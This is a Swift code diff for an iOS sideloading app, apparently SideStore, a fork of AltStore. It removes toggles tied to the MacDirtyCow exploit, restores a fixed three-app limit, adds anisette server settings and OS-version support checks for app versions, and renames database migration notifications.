         let isLegacyDeactivationSupported = !ProcessInfo.processInfo.isOperatingSystemAtLeast(ios13_5)
         let activeAppLimitIncludesExtensions = !ProcessInfo.processInfo.isOperatingSystemAtLeast(ios13_5)
@@ -70,31 +77,20 @@ public extension UserDefaults {
         let ios14 = OperatingSystemVersion(majorVersion: 14, minorVersion: 0, patchVersion: 0)
         let localServerSupportsRefreshing = !ProcessInfo.processInfo.isOperatingSystemAtLeast(ios14)
         
-        let ios16 = OperatingSystemVersion(majorVersion: 16, minorVersion: 0, patchVersion: 0)
-        let ios16_2 = OperatingSystemVersion(majorVersion: 16, minorVersion: 2, patchVersion: 0)
-        let ios15_7_2 = OperatingSystemVersion(majorVersion: 15, minorVersion: 7, patchVersion: 2)
-
-        // MacDirtyCow supports iOS 14.0 - 15.7.1 OR 16.0 - 16.1.2
-        let isCowExploitSupported =
-            (ProcessInfo.processInfo.isOperatingSystemAtLeast(ios14) && !ProcessInfo.processInfo.isOperatingSystemAtLeast(ios15_7_2)) ||
-            (ProcessInfo.processInfo.isOperatingSystemAtLeast(ios16) && !ProcessInfo.processInfo.isOperatingSystemAtLeast(ios16_2))
-
         let defaults = [
+            #keyPath(UserDefaults.isAppLimitDisabled): false,
             #keyPath(UserDefaults.isBackgroundRefreshEnabled): true,
+            #keyPath(UserDefaults.isIdleTimeoutDisableEnabled): true,
+            #keyPath(UserDefaults.isPairingReset): true,
             #keyPath(UserDefaults.isLegacyDeactivationSupported): isLegacyDeactivationSupported,
             #keyPath(UserDefaults.activeAppLimitIncludesExtensions): activeAppLimitIncludesExtensions,
             #keyPath(UserDefaults.localServerSupportsRefreshing): localServerSupportsRefreshing,
             #keyPath(UserDefaults.requiresAppGroupMigration): true,
-            #keyPath(UserDefaults.enableCowExploit): true,
-            #keyPath(UserDefaults.isCowExploitSupported): isCowExploitSupported,
-        ]
+            #keyPath(UserDefaults.menuAnisetteList): "https://servers.sidestore.io/servers.json",
+            #keyPath(UserDefaults.menuAnisetteURL): "https://ani.sidestore.io"
+        ] as [String : Any]
         
         UserDefaults.standard.register(defaults: defaults)
         UserDefaults.shared.register(defaults: defaults)
-        
-        if !isCowExploitSupported {
-            // Disable enableCowExploit if running iOS version that doesn't support MacDirtyCow.
-            UserDefaults.standard.enableCowExploit = false
-        }
     }
 }

AltStoreCore/Model/AppVersion.swift

@@ -40,7 +40,7 @@ public class AppVersion: NSManagedObject, Decodable, Fetchable
     
     /* Relationships */
     @NSManaged public private(set) var app: StoreApp?
-    @NSManaged public private(set) var latestVersionApp: StoreApp?
+    @NSManaged @objc(latestVersionApp) public internal(set) var latestSupportedVersionApp: StoreApp?
     
     private override init(entity: NSEntityDescription, insertInto context: NSManagedObjectContext?)
     {
@@ -54,6 +54,8 @@ public class AppVersion: NSManagedObject, Decodable, Fetchable
         case localizedDescription
         case downloadURL
         case size
+        case minOSVersion
+        case maxOSVersion
     }
     
     public required init(from decoder: Decoder) throws
@@ -72,6 +74,9 @@ public class AppVersion: NSManagedObject, Decodable, Fetchable
             
             self.downloadURL = try container.decode(URL.self, forKey: .downloadURL)
             self.size = try container.decode(Int64.self, forKey: .size)
+
+            self._minOSVersion = try container.decodeIfPresent(String.self, forKey: .minOSVersion)
+            self._maxOSVersion = try container.decodeIfPresent(String.self, forKey: .maxOSVersion)
         }
         catch
         {
@@ -113,4 +118,13 @@ public extension AppVersion
 
         return appVersion
     }
+    
+    var isSupported: Bool {
+        if let minOSVersion = self.minOSVersion, !ProcessInfo.processInfo.isOperatingSystemAtLeast(minOSVersion) {
+            return false
+        } else if let maxOSVersion = self.maxOSVersion, ProcessInfo.processInfo.operatingSystemVersion > maxOSVersion {
+            return false
+        }
+        return true
+    }
 }

AltStoreCore/Model/DatabaseManager.swift

@@ -13,11 +13,11 @@ import Roxas
 
 extension CFNotificationName
 {
-    fileprivate static let willAccessDatabase = CFNotificationName("com.rileytestut.AltStore.WillAccessDatabase" as CFString)
+    fileprivate static let willMigrateDatabase = CFNotificationName("com.rileytestut.AltStore.WillMigrateDatabase" as CFString)
 }
 
-private let ReceivedWillAccessDatabaseNotification: @convention(c) (CFNotificationCenter?, UnsafeMutableRawPointer?, CFNotificationName?, UnsafeRawPointer?, CFDictionary?) -> Void = { (center, observer, name, object, userInfo) in
-    DatabaseManager.shared.receivedWillAccessDatabaseNotification()
+private let ReceivedWillMigrateDatabaseNotification: @convention(c) (CFNotificationCenter?, UnsafeMutableRawPointer?, CFNotificationName?, UnsafeRawPointer?, CFDictionary?) -> Void = { (center, observer, name, object, userInfo) in
+    DatabaseManager.shared.receivedWillMigrateDatabaseNotification()
 }
 
 fileprivate class PersistentContainer: RSTPersistentContainer
@@ -52,15 +52,15 @@ public class DatabaseManager
     private let coordinator = NSFileCoordinator()
     private let coordinatorQueue = OperationQueue()
     
-    private var ignoreWillAccessDatabaseNotification = false
-    
+    private var ignoreWillMigrateDatabaseNotification = false
+
     private init()
     {
         self.persistentContainer = PersistentContainer(name: "AltStore", bundle: Bundle(for: DatabaseManager.self))
         self.persistentContainer.preferredMergePolicy = MergePolicy()
         
         let observer = Unmanaged.passUnretained(self).toOpaque()
-        CFNotificationCenterAddObserver(CFNotificationCenterGetDarwinNotifyCenter(), observer, ReceivedWillAccessDatabaseNotification, CFNotificationName.willAccessDatabase.rawValue, nil, .deliverImmediately)
+        CFNotificationCenterAddObserver(CFNotificationCenterGetDarwinNotifyCenter(), observer, ReceivedWillMigrateDatabaseNotification, CFNotificationName.willMigrateDatabase.rawValue, nil, .deliverImmediately)
     }
 }
 
@@ -87,10 +87,13 @@ public extension DatabaseManager
             
             guard !self.isStarted else { return finish(nil) }
             
-            // Quit any other running AltStore processes to prevent concurrent database access during and after migration.
-            self.ignoreWillAccessDatabaseNotification = true
-            CFNotificationCenterPostNotification(CFNotificationCenterGetDarwinNotifyCenter(), .willAccessDatabase, nil, nil, true)
-            
+            if self.persistentContainer.isMigrationRequired {
+
+                // Quit any other running AltStore processes to prevent concurrent database access during and after migration.
+                self.ignoreWillMigrateDatabaseNotification = true
+                CFNotificationCenterPostNotification(CFNotificationCenterGetDarwinNotifyCenter(), .willMigrateDatabase, nil, nil, true)
+            }
+
             self.migrateDatabaseToAppGroupIfNeeded { (result) in
                 switch result
                 {
@@ -229,7 +232,7 @@ private extension DatabaseManager
             else
             {
                 storeApp = StoreApp.makeAltStoreApp(in: context)
-                storeApp.latestVersion?.version = localApp.version
+                storeApp.latestSupportedVersion?.version = localApp.version
                 storeApp.source = altStoreSource
             }
                         
@@ -417,13 +420,13 @@ private extension DatabaseManager
         }
     }
     
-    func receivedWillAccessDatabaseNotification()
+    func receivedWillMigrateDatabaseNotification()
     {
-        defer { self.ignoreWillAccessDatabaseNotification = false }
-        
+        defer { self.ignoreWillMigrateDatabaseNotification = false }
+
         // Ignore notifications sent by the current process.
-        guard !self.ignoreWillAccessDatabaseNotification else { return }
-        
+        guard !self.ignoreWillMigrateDatabaseNotification else { return }
+
         exit(104)
     }
 }

AltStoreCore/Model/InstalledApp.swift

@@ -6,28 +6,14 @@
 //  Copyright © 2019 Riley Testut. All rights reserved.
 //
 
-import CoreData
 import Foundation
+import CoreData
 
 import AltSign
 import SemanticVersion
 
 // Free developer accounts are limited to only 3 active sideloaded apps at a time as of iOS 13.3.1.
-public extension InstalledApp
-{
-    static var freeAccountActiveAppsLimit: Int
-    {
-        if UserDefaults.standard.enableCowExploit && UserDefaults.standard.isCowExploitSupported
-        {
-            return 99999
-        }
-        else
-        {
-            // Free developer accounts are limited to only 3 active sideloaded apps at a time as of iOS 13.3.1.
-            return 3
-        }
-    }
-}
+public let ALTActiveAppsLimit = 3
 
 public protocol InstalledAppProtocol: Fetchable
 {
@@ -70,40 +56,35 @@ public class InstalledApp: NSManagedObject, InstalledAppProtocol
     
     @NSManaged public private(set) var loggedErrors: NSSet /* Set<LoggedError> */ // Use NSSet to avoid eagerly fetching values.
     
-    public var isSideloaded: Bool
-    {
+    public var isSideloaded: Bool {
         return self.storeApp == nil
     }
     
-    @objc public var hasUpdate: Bool
-    {
+    @objc public var hasUpdate: Bool {
         if self.storeApp == nil { return false }
-        if self.storeApp!.latestVersion == nil { return false }
-        
+        if self.storeApp!.latestSupportedVersion == nil { return false }
+
         let currentVersion = SemanticVersion(self.version)
-        let latestVersion = SemanticVersion(self.storeApp!.latestVersion!.version)
-        
-        if currentVersion == nil || latestVersion == nil
-        {
+        let latestVersion = SemanticVersion(self.storeApp!.latestSupportedVersion!.version)
+
+        if currentVersion == nil || latestVersion == nil {
             // One of the versions is not valid SemVer, fall back to comparing the version strings by character
-            return self.version < self.storeApp!.latestVersion!.version
+            return self.version < self.storeApp!.latestSupportedVersion!.version
         }
         
         return currentVersion! < latestVersion!
     }
     
-    public var appIDCount: Int
-    {
+    public var appIDCount: Int {
         return 1 + self.appExtensions.count
     }
     
-    public var requiredActiveSlots: Int
-    {
+    public var requiredActiveSlots: Int {
         let requiredActiveSlots = UserDefaults.standard.activeAppLimitIncludesExtensions ? self.appIDCount : 1
         return requiredActiveSlots
     }
     
-    override private init(entity: NSEntityDescription, insertInto context: NSManagedObjectContext?)
+    private override init(entity: NSEntityDescription, insertInto context: NSManagedObjectContext?)
     {
         super.init(entity: entity, insertInto: context)
     }
@@ -151,8 +132,7 @@ public class InstalledApp: NSManagedObject, InstalledAppProtocol
         let alternateIconURL = self.alternateIconURL
         let fileURL = self.fileURL
         
-        DispatchQueue.global().async
-        {
+        DispatchQueue.global().async {
             do
             {
                 if hasAlternateIcon,
@@ -185,6 +165,7 @@ public extension InstalledApp
         let fetchRequest = InstalledApp.fetchRequest() as NSFetchRequest<InstalledApp>
         fetchRequest.predicate = NSPredicate(format: "%K == YES AND %K == YES",
                                              #keyPath(InstalledApp.isActive), #keyPath(InstalledApp.hasUpdate))
+
         return fetchRequest
     }
     
@@ -212,7 +193,7 @@ public extension InstalledApp
     
     class func fetchAppsForRefreshingAll(in context: NSManagedObjectContext) -> [InstalledApp]
     {
-        var predicate = NSPredicate(format: "%K == YES AND %K != %@", #keyPath(InstalledApp.isActive), #keyPath(InstalledApp.bundleIdentifier), StoreApp.altstoreAppID)
+        let predicate = NSPredicate(format: "%K == YES AND %K != %@", #keyPath(InstalledApp.isActive), #keyPath(InstalledApp.bundleIdentifier), StoreApp.altstoreAppID)
         print("Fetch Apps for Refreshing All 'AltStore' predicate: \(String(describing: predicate))")
         
 //        if let patreonAccount = DatabaseManager.shared.patreonAccount(in: context), patreonAccount.isPatron, PatreonAPI.shared.isAuthenticated
@@ -243,7 +224,7 @@ public extension InstalledApp
         // Date 6 hours before now.
         let date = Date().addingTimeInterval(-1 * 6 * 60 * 60)
         
-        var predicate = NSPredicate(format: "(%K == YES) AND (%K < %@) AND (%K != %@)",
+        let predicate = NSPredicate(format: "(%K == YES) AND (%K < %@) AND (%K != %@)",
                                     #keyPath(InstalledApp.isActive),
                                     #keyPath(InstalledApp.refreshedDate), date as NSDate,
                                     #keyPath(InstalledApp.bundleIdentifier), StoreApp.altstoreAppID)
@@ -275,8 +256,7 @@ public extension InstalledApp
 
 public extension InstalledApp
 {
-    var openAppURL: URL
-    {
+    var openAppURL: URL {
         let openAppURL = URL(string: "altstore-" + self.bundleIdentifier + "://")!
         return openAppURL
     }
@@ -290,22 +270,18 @@ public extension InstalledApp
 
 public extension InstalledApp
 {
-    class var appsDirectoryURL: URL
-    {
+    class var appsDirectoryURL: URL {
         let baseDirectory = FileManager.default.altstoreSharedDirectory ?? FileManager.default.applicationSupportDirectory
         let appsDirectoryURL = baseDirectory.appendingPathComponent("Apps")
         
         do { try FileManager.default.createDirectory(at: appsDirectoryURL, withIntermediateDirectories: true, attributes: nil) }
         catch { print("Creating App Directory Error: \(error)") }
-        print("`appsDirectoryURL` is set to: \(appsDirectoryURL.absoluteString)")
         return appsDirectoryURL
     }
     
-    class var legacyAppsDirectoryURL: URL
-    {
+    class var legacyAppsDirectoryURL: URL {
         let baseDirectory = FileManager.default.applicationSupportDirectory
         let appsDirectoryURL = baseDirectory.appendingPathComponent("Apps")
-        print("legacy `appsDirectoryURL` is set to: \(appsDirectoryURL.absoluteString)")
         return appsDirectoryURL
     }
     
@@ -350,33 +326,27 @@ public extension InstalledApp
         return installedBackupAppUTI
     }
     
-    var directoryURL: URL
-    {
+    var directoryURL: URL {
         return InstalledApp.directoryURL(for: self)
     }
     
-    var fileURL: URL
-    {
+    var fileURL: URL {
         return InstalledApp.fileURL(for: self)
     }
     
-    var refreshedIPAURL: URL
-    {
+    var refreshedIPAURL: URL {
         return InstalledApp.refreshedIPAURL(for: self)
     }
     
-    var installedAppUTI: String
-    {
+    var installedAppUTI: String {
         return InstalledApp.installedAppUTI(forBundleIdentifier: self.resignedBundleIdentifier)
     }
     
-    var installedBackupAppUTI: String
-    {
+    var installedBackupAppUTI: String {
         return InstalledApp.installedBackupAppUTI(forBundleIdentifier: self.resignedBundleIdentifier)
     }
     
-    var alternateIconURL: URL
-    {
+    var alternateIconURL: URL {
         return InstalledApp.alternateIconURL(for: self)
     }
 }